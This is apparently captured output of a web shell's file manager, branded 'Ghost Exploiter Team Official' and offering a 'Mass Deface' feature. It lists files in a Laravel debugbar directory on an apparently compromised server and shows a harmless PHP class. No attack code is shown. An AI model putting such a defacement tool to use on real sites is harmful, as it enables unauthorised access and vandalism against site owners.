Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
barryvdh
/
laravel-debugbar
/
src
/
Support
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Clockwork
--
ren
Explain.php
4.587KB
edt
ren
RequestIdGenerator.php
0.266KB
edt
ren
<?php namespace Barryvdh\Debugbar\Support; use DebugBar\RequestIdGeneratorInterface; use Illuminate\Support\Str; class RequestIdGenerator implements RequestIdGeneratorInterface { public function generate(): string { return (string) Str::ulid(); } }